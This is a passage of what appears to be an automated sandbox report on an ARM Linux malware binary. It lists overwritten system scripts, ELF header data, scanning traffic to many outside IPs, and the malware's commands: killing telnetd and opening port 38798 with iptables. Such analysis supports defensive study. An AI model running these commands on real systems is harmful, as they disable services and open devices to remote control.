                                                                                                                                SHA-512:681E59EF7DEE6E6F60C0ABF3325E5F64DF4CEA10A4D0DA585198ECD3BE951722DBE2559F6CE20E70CB97E84E7CEFEED4DC6AC78204D9C9FF403343ECEC7997A0
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.exit 0../usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/popularity-contest/examples/bin/popcon-process.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23
                                                                                                                                Entropy (8bit):3.882045108136863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOORgn:Tn
                                                                                                                                MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                                SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                                SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                                SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/tmux/examples/bash_completion_tmux.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23
                                                                                                                                Entropy (8bit):3.882045108136863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOORgn:Tn
                                                                                                                                MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                                SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                                SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                                SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/toshset/toshiba-acpi/2.6.26/install.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23
                                                                                                                                Entropy (8bit):3.882045108136863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOORgn:Tn
                                                                                                                                MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                                SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                                SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                                SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/toshset/toshiba-acpi/2.6.28/install.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23
                                                                                                                                Entropy (8bit):3.882045108136863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOORgn:Tn
                                                                                                                                MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                                SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                                SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                                SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/transmission-common/examples/send-email-when-torrent-done.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23
                                                                                                                                Entropy (8bit):3.882045108136863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOORgn:Tn
                                                                                                                                MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                                SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                                SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                                SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.exit 1.
                                                                                                                                /usr/share/doc/xdotool/examples/ffsp.sh
                                                                                                                                Process:/tmp/KnAY2OIPI3
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):23
                                                                                                                                Entropy (8bit):3.882045108136863
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:qXVOORgn:Tn
                                                                                                                                MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                                SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                                SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                                SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                                Malicious:false
                                                                                                                                Preview: ./usr/networks&.exit 1.

                                                                                                                                Static File Info

                                                                                                                                General

                                                                                                                                File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                                                                                                                                Entropy (8bit):5.819679405566689
                                                                                                                                TrID:
                                                                                                                                • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                                                                                File name:KnAY2OIPI3
                                                                                                                                File size:307960
                                                                                                                                MD5:eec5c6c219535fba3a0492ea8118b397
                                                                                                                                SHA1:292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
                                                                                                                                SHA256:12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef
                                                                                                                                SHA512:3482c8324a18302f0f37b6e23ed85f24fff9f50bb568d8fd7461bf57f077a7c592f7a88bb2e1c398699958946d87bb93ab744d13a0003f9b879c15e6471f7400
                                                                                                                                SSDEEP:6144:T2s/gAWuboqsJ9xcJxspJBqQgTuaJZRhVabE5wKSDP99zBa77oNsKqqfPqOJ:T2s/bW+UmJqBxAuaPRhVabEDSDP99zBT
                                                                                                                                File Content Preview:.ELF..............(.........4...P.......4. ...(........p............(...(...............................................................8...........................................Q.td..................................-...L..................@-.,@...0....S

                                                                                                                                Static ELF Info

                                                                                                                                ELF header

                                                                                                                                Class:ELF32
                                                                                                                                Data:2's complement, little endian
                                                                                                                                Version:1 (current)
                                                                                                                                Machine:ARM
                                                                                                                                Version Number:0x1
                                                                                                                                Type:EXEC (Executable file)
                                                                                                                                OS/ABI:UNIX - System V
                                                                                                                                ABI Version:0
                                                                                                                                Entry Point Address:0x8194
                                                                                                                                Flags:0x4000002
                                                                                                                                ELF Header Size:52
                                                                                                                                Program Header Offset:52
                                                                                                                                Program Header Size:32
                                                                                                                                Number of Program Headers:5
                                                                                                                                Section Header Offset:307280
                                                                                                                                Section Header Size:40
                                                                                                                                Number of Section Headers:17
                                                                                                                                Header String Table Index:16

                                                                                                                                Sections

                                                                                                                                NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                                                                                NULL0x00x00x00x00x0000
                                                                                                                                .initPROGBITS0x80d40xd40x100x00x6AX004
                                                                                                                                .textPROGBITS0x80f00xf00x34a980x00x6AX0016
                                                                                                                                .finiPROGBITS0x3cb880x34b880x100x00x6AX004
                                                                                                                                .rodataPROGBITS0x3cb980x34b980xb9d00x00x2A008
                                                                                                                                .ARM.extabPROGBITS0x485680x405680x180x00x2A004
                                                                                                                                .ARM.exidxARM_EXIDX0x485800x405800x1280x00x82AL204
                                                                                                                                .eh_framePROGBITS0x510000x410000x40x00x3WA004
                                                                                                                                .tbssNOBITS0x510040x410040x80x00x403WAT004
                                                                                                                                .init_arrayINIT_ARRAY0x510040x410040x40x00x3WA004
                                                                                                                                .fini_arrayFINI_ARRAY0x510080x410080x40x00x3WA004
                                                                                                                                .data.rel.roPROGBITS0x510100x410100x180x00x3WA004
                                                                                                                                .gotPROGBITS0x510280x410280xb80x40x3WA004
                                                                                                                                .dataPROGBITS0x510e00x410e00x9ec80x00x3WA008
                                                                                                                                .bssNOBITS0x5afa80x4afa80x25b900x00x3WA008
                                                                                                                                .ARM.attributesARM_ATTRIBUTES0x00x4afa80x160x00x0001
                                                                                                                                .shstrtabSTRTAB0x00x4afbe0x900x00x0001

                                                                                                                                Program Segments

                                                                                                                                TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                                                                                EXIDX0x405800x485800x485800x1280x1280x4R 0x4.ARM.exidx
                                                                                                                                LOAD0x00x80000x80000x406a80x406a80x5R E0x8000.init .text .fini .rodata .ARM.extab .ARM.exidx
                                                                                                                                LOAD0x410000x510000x510000x9fa80x2fb380x6RW 0x8000.eh_frame .init_array .fini_array .data.rel.ro .got .data .bss
                                                                                                                                TLS0x410040x510040x510040x00x80x4R 0x4
                                                                                                                                GNU_STACK0x00x00x00x00x00x7RWE0x4

                                                                                                                                Network Behavior

                                                                                                                                Network Port Distribution

                                                                                                                                TCP Packets

                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                May 1, 2021 17:51:07.259013891 CEST4135637215192.168.2.202.25.210.178
                                                                                                                                May 1, 2021 17:51:07.259319067 CEST348485555192.168.2.20184.164.122.183
                                                                                                                                May 1, 2021 17:51:07.259380102 CEST3573880192.168.2.2051.93.41.179
                                                                                                                                May 1, 2021 17:51:07.259433031 CEST334468080192.168.2.2083.138.58.60
                                                                                                                                May 1, 2021 17:51:07.259537935 CEST440887574192.168.2.2077.89.211.235
                                                                                                                                May 1, 2021 17:51:07.259669065 CEST3909452869192.168.2.20110.196.111.163
                                                                                                                                May 1, 2021 17:51:07.259763956 CEST5234080192.168.2.2062.217.2.44
                                                                                                                                May 1, 2021 17:51:07.259926081 CEST4146452869192.168.2.20172.58.106.47
                                                                                                                                May 1, 2021 17:51:07.259985924 CEST464628080192.168.2.20188.39.11.49
                                                                                                                                May 1, 2021 17:51:07.260092974 CEST354388443192.168.2.2021.167.23.229
                                                                                                                                May 1, 2021 17:51:07.260263920 CEST380827574192.168.2.20154.228.225.43
                                                                                                                                May 1, 2021 17:51:07.260292053 CEST4431252869192.168.2.20142.185.51.138
                                                                                                                                May 1, 2021 17:51:07.260385036 CEST5732449152192.168.2.20121.235.253.2
                                                                                                                                May 1, 2021 17:51:07.260483027 CEST4962037215192.168.2.2029.145.147.14
                                                                                                                                May 1, 2021 17:51:07.260546923 CEST395325555192.168.2.20103.85.31.98
                                                                                                                                May 1, 2021 17:51:07.260668039 CEST3407680192.168.2.2019.118.150.224
                                                                                                                                May 1, 2021 17:51:07.260772943 CEST4802681192.168.2.20158.169.216.109
                                                                                                                                May 1, 2021 17:51:07.260950089 CEST6009280192.168.2.2018.203.169.48
                                                                                                                                May 1, 2021 17:51:07.261044025 CEST4281080192.168.2.2093.208.214.175
                                                                                                                                May 1, 2021 17:51:07.261118889 CEST3331881192.168.2.20133.43.111.70
                                                                                                                                May 1, 2021 17:51:07.261221886 CEST456325555192.168.2.20129.12.160.142
                                                                                                                                May 1, 2021 17:51:07.261332035 CEST399528443192.168.2.2094.167.107.6
                                                                                                                                May 1, 2021 17:51:07.261405945 CEST361105555192.168.2.2087.70.234.237
                                                                                                                                May 1, 2021 17:51:07.261559963 CEST571405555192.168.2.2037.146.10.10
                                                                                                                                May 1, 2021 17:51:07.261657000 CEST331327574192.168.2.2012.106.20.19
                                                                                                                                May 1, 2021 17:51:07.261873007 CEST5495049152192.168.2.2094.169.172.220
                                                                                                                                May 1, 2021 17:51:07.261878967 CEST560788080192.168.2.20110.102.65.9
                                                                                                                                May 1, 2021 17:51:07.261953115 CEST503148443192.168.2.2041.177.29.19
                                                                                                                                May 1, 2021 17:51:07.262043953 CEST3313080192.168.2.20174.82.166.212
                                                                                                                                May 1, 2021 17:51:07.262202978 CEST343248080192.168.2.20192.127.211.209
                                                                                                                                May 1, 2021 17:51:07.262305021 CEST498328443192.168.2.20120.206.173.159
                                                                                                                                May 1, 2021 17:51:07.262392044 CEST527765555192.168.2.20147.73.77.123
                                                                                                                                May 1, 2021 17:51:07.262502909 CEST570428080192.168.2.20106.249.234.237
                                                                                                                                May 1, 2021 17:51:07.262598991 CEST533768443192.168.2.2023.216.220.40
                                                                                                                                May 1, 2021 17:51:07.262689114 CEST4780849152192.168.2.207.108.184.228
                                                                                                                                May 1, 2021 17:51:07.262800932 CEST4811080192.168.2.20109.176.26.151
                                                                                                                                May 1, 2021 17:51:07.262893915 CEST3540649152192.168.2.2034.9.142.75
                                                                                                                                May 1, 2021 17:51:07.262976885 CEST4139080192.168.2.20204.86.91.239
                                                                                                                                May 1, 2021 17:51:07.263073921 CEST3367480192.168.2.20151.197.193.88
                                                                                                                                May 1, 2021 17:51:07.263195038 CEST5147449152192.168.2.20117.254.218.74
                                                                                                                                May 1, 2021 17:51:07.263257980 CEST6018880192.168.2.20145.78.201.48
                                                                                                                                May 1, 2021 17:51:07.263359070 CEST5119680192.168.2.20181.228.162.132
                                                                                                                                May 1, 2021 17:51:07.263437033 CEST353667574192.168.2.20199.53.125.193
                                                                                                                                May 1, 2021 17:51:07.263478994 CEST460948080192.168.2.20105.32.8.235
                                                                                                                                May 1, 2021 17:51:07.263509035 CEST552007574192.168.2.20149.10.244.182
                                                                                                                                May 1, 2021 17:51:07.263551950 CEST489648080192.168.2.2034.106.39.153
                                                                                                                                May 1, 2021 17:51:07.263618946 CEST5062680192.168.2.20196.16.113.212
                                                                                                                                May 1, 2021 17:51:07.263662100 CEST5340280192.168.2.20121.250.87.121
                                                                                                                                May 1, 2021 17:51:07.263693094 CEST490948443192.168.2.2080.230.157.194
                                                                                                                                May 1, 2021 17:51:07.263745070 CEST5441280192.168.2.20163.46.160.172
                                                                                                                                May 1, 2021 17:51:07.263787031 CEST573568080192.168.2.20119.52.222.172
                                                                                                                                May 1, 2021 17:51:07.263835907 CEST575268080192.168.2.2076.0.10.171
                                                                                                                                May 1, 2021 17:51:07.263879061 CEST575847574192.168.2.20193.81.154.165
                                                                                                                                May 1, 2021 17:51:07.263941050 CEST4842080192.168.2.2054.133.190.191
                                                                                                                                May 1, 2021 17:51:07.263969898 CEST525968080192.168.2.20215.1.190.118
                                                                                                                                May 1, 2021 17:51:07.264008999 CEST415968080192.168.2.2016.179.214.74
                                                                                                                                May 1, 2021 17:51:07.264044046 CEST558825555192.168.2.2090.153.163.206
                                                                                                                                May 1, 2021 17:51:07.264084101 CEST4718880192.168.2.2012.19.201.8
                                                                                                                                May 1, 2021 17:51:07.264127970 CEST5469280192.168.2.2030.91.154.30
                                                                                                                                May 1, 2021 17:51:07.264158010 CEST460488080192.168.2.20102.112.99.110
                                                                                                                                May 1, 2021 17:51:07.264204979 CEST6062680192.168.2.2055.209.196.232
                                                                                                                                May 1, 2021 17:51:07.264234066 CEST4607252869192.168.2.2052.224.63.176
                                                                                                                                May 1, 2021 17:51:07.264266014 CEST5376680192.168.2.20133.157.151.114
                                                                                                                                May 1, 2021 17:51:07.264317036 CEST376408443192.168.2.20179.5.44.160
                                                                                                                                May 1, 2021 17:51:07.264353991 CEST336488080192.168.2.20147.209.183.102
                                                                                                                                May 1, 2021 17:51:07.264410973 CEST519588080192.168.2.2047.208.112.60
                                                                                                                                May 1, 2021 17:51:07.264441967 CEST5791081192.168.2.2013.198.237.32
                                                                                                                                May 1, 2021 17:51:07.264476061 CEST596485555192.168.2.20191.159.187.60
                                                                                                                                May 1, 2021 17:51:07.264522076 CEST4084680192.168.2.2084.24.102.184
                                                                                                                                May 1, 2021 17:51:07.264558077 CEST489388443192.168.2.20207.188.217.55
                                                                                                                                May 1, 2021 17:51:07.264580011 CEST4837280192.168.2.20154.155.107.69
                                                                                                                                May 1, 2021 17:51:07.264625072 CEST373967574192.168.2.20138.184.234.192
                                                                                                                                May 1, 2021 17:51:07.264650106 CEST415828080192.168.2.202.252.1.26
                                                                                                                                May 1, 2021 17:51:07.264676094 CEST3813052869192.168.2.20186.198.44.96
                                                                                                                                May 1, 2021 17:51:07.264725924 CEST576367574192.168.2.20110.127.34.195
                                                                                                                                May 1, 2021 17:51:07.264754057 CEST3779237215192.168.2.20130.11.96.200
                                                                                                                                May 1, 2021 17:51:07.264795065 CEST4941037215192.168.2.20142.162.240.88
                                                                                                                                May 1, 2021 17:51:07.264827013 CEST467888080192.168.2.20194.66.198.59
                                                                                                                                May 1, 2021 17:51:07.264870882 CEST375725555192.168.2.2059.87.199.121
                                                                                                                                May 1, 2021 17:51:07.264897108 CEST371468080192.168.2.2031.33.198.128
                                                                                                                                May 1, 2021 17:51:07.264929056 CEST373888080192.168.2.2041.67.135.38
                                                                                                                                May 1, 2021 17:51:07.264965057 CEST467585555192.168.2.209.120.123.80
                                                                                                                                May 1, 2021 17:51:07.265016079 CEST4240052869192.168.2.20165.11.161.224
                                                                                                                                May 1, 2021 17:51:07.265044928 CEST336047574192.168.2.2075.20.211.169
                                                                                                                                May 1, 2021 17:51:07.265070915 CEST390848443192.168.2.20108.108.45.183
                                                                                                                                May 1, 2021 17:51:07.265110970 CEST5614637215192.168.2.20186.179.212.59
                                                                                                                                May 1, 2021 17:51:07.265140057 CEST360968080192.168.2.2084.56.89.143
                                                                                                                                May 1, 2021 17:51:07.265191078 CEST497168080192.168.2.2011.34.180.15
                                                                                                                                May 1, 2021 17:51:07.265218973 CEST4752080192.168.2.2026.228.15.224
                                                                                                                                May 1, 2021 17:51:07.265266895 CEST4196480192.168.2.2043.254.137.154
                                                                                                                                May 1, 2021 17:51:07.265312910 CEST544908080192.168.2.20171.106.42.2
                                                                                                                                May 1, 2021 17:51:07.265343904 CEST602868080192.168.2.20120.58.188.59
                                                                                                                                May 1, 2021 17:51:07.265373945 CEST534708080192.168.2.20152.55.230.154
                                                                                                                                May 1, 2021 17:51:07.265413046 CEST6027680192.168.2.2046.211.206.164
                                                                                                                                May 1, 2021 17:51:07.265456915 CEST4521880192.168.2.2052.34.92.202
                                                                                                                                May 1, 2021 17:51:07.265496969 CEST4802880192.168.2.20151.232.125.236
                                                                                                                                May 1, 2021 17:51:07.265557051 CEST3652081192.168.2.20138.77.221.45
                                                                                                                                May 1, 2021 17:51:07.265582085 CEST6037480192.168.2.20152.237.94.215
                                                                                                                                May 1, 2021 17:51:07.265614033 CEST538668080192.168.2.2048.158.121.17
                                                                                                                                May 1, 2021 17:51:07.265645027 CEST4443680192.168.2.20121.132.208.201

                                                                                                                                DNS Queries

                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                May 1, 2021 17:51:26.863440990 CEST192.168.2.208.8.8.80x2Standard query (0)dht.transmissionbt.comA (IP address)IN (0x0001)
                                                                                                                                May 1, 2021 17:51:26.931164980 CEST192.168.2.208.8.8.80x3Standard query (0)router.bittorrent.comA (IP address)IN (0x0001)
                                                                                                                                May 1, 2021 17:51:26.982115984 CEST192.168.2.208.8.8.80x4Standard query (0)router.utorrent.comA (IP address)IN (0x0001)
                                                                                                                                May 1, 2021 17:51:27.033230066 CEST192.168.2.208.8.8.80x5Standard query (0)bttracker.debian.orgA (IP address)IN (0x0001)

                                                                                                                                DNS Answers

                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                May 1, 2021 17:51:26.925658941 CEST8.8.8.8192.168.2.200x2No error (0)dht.transmissionbt.com212.129.33.59A (IP address)IN (0x0001)
                                                                                                                                May 1, 2021 17:51:26.925658941 CEST8.8.8.8192.168.2.200x2No error (0)dht.transmissionbt.com87.98.162.88A (IP address)IN (0x0001)
                                                                                                                                May 1, 2021 17:51:26.980051041 CEST8.8.8.8192.168.2.200x3No error (0)router.bittorrent.com67.215.246.10A (IP address)IN (0x0001)
                                                                                                                                May 1, 2021 17:51:27.031181097 CEST8.8.8.8192.168.2.200x4No error (0)router.utorrent.com82.221.103.244A (IP address)IN (0x0001)
                                                                                                                                May 1, 2021 17:51:27.093342066 CEST8.8.8.8192.168.2.200x5No error (0)bttracker.debian.orgbttracker.acc.umu.seCNAME (Canonical name)IN (0x0001)
                                                                                                                                May 1, 2021 17:51:27.093342066 CEST8.8.8.8192.168.2.200x5No error (0)bttracker.acc.umu.se130.239.18.159A (IP address)IN (0x0001)

                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                • 164.132.44.102:80
                                                                                                                                • 127.0.0.1:80
                                                                                                                                • 52.58.36.52:80
                                                                                                                                • 173.222.98.151:80
                                                                                                                                • 127.0.0.1:8080
                                                                                                                                • 149.47.68.142:80
                                                                                                                                • 134.84.133.102:80
                                                                                                                                • 114.158.233.160:80
                                                                                                                                • 127.0.0.1:7574
                                                                                                                                • 66.221.91.189:80
                                                                                                                                • 172.82.182.74:80
                                                                                                                                • 155.230.225.129:80
                                                                                                                                • 23.78.24.125:80
                                                                                                                                • 182.254.240.127:80
                                                                                                                                • 92.122.164.134:80
                                                                                                                                • 168.226.35.54:80
                                                                                                                                • 171.247.8.159:80
                                                                                                                                • 216.164.6.45:80
                                                                                                                                • 65.110.89.33:80
                                                                                                                                • 38.35.98.151:80
                                                                                                                                • 199.204.251.131:80

                                                                                                                                System Behavior

                                                                                                                                General

                                                                                                                                Start time:17:51:01
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/KnAY2OIPI3
                                                                                                                                Arguments:/usr/bin/qemu-arm /tmp/KnAY2OIPI3
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:17:51:01
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/KnAY2OIPI3
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:17:51:01
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/KnAY2OIPI3
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:17:51:01
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/KnAY2OIPI3
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:17:51:01
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:01
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:01
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/usr/bin/killall
                                                                                                                                Arguments:killall -9 telnetd utelnetd scfgmgr
                                                                                                                                File size:23736 bytes
                                                                                                                                MD5 hash:df59c8b62bfcf5b3bd7feaaa2295a9f7

                                                                                                                                General

                                                                                                                                Start time:17:51:01
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/KnAY2OIPI3
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:17:51:01
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/KnAY2OIPI3
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:17:51:01
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/KnAY2OIPI3
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:17:51:16
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/KnAY2OIPI3
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:17:51:16
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 38798 -j ACCEPT"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:16
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:16
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I INPUT -p tcp --destination-port 38798 -j ACCEPT
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:17:51:16
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:n/a
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:17:51:16
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/modprobe
                                                                                                                                Arguments:/sbin/modprobe ip_tables
                                                                                                                                File size:9 bytes
                                                                                                                                MD5 hash:3d0e6fb594a9ad9c854ace3e507f86c5

                                                                                                                                General

                                                                                                                                Start time:17:51:16
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/KnAY2OIPI3
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:17:51:16
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 38798 -j ACCEPT"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:16
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:16
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I OUTPUT -p tcp --source-port 38798 -j ACCEPT
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:17:51:16
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/KnAY2OIPI3
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:17:51:16
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:/bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 38798 -j ACCEPT"
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:16
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/bin/sh
                                                                                                                                Arguments:n/a
                                                                                                                                File size:4 bytes
                                                                                                                                MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                                General

                                                                                                                                Start time:17:51:16
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/sbin/iptables
                                                                                                                                Arguments:iptables -I PREROUTING -t nat -p tcp --destination-port 38798 -j ACCEPT
                                                                                                                                File size:13 bytes
                                                                                                                                MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                                General

                                                                                                                                Start time:17:51:16
                                                                                                                                Start date:01/05/2021
                                                                                                                                Path:/tmp/KnAY2OIPI3
                                                                                                                                Arguments:n/a
                                                                                                                                File size:307960 bytes
                                                                                                                                MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                                General

                                                                                                                                Start time:17:51:16
                                                                                                                                Start date:01/05/2021
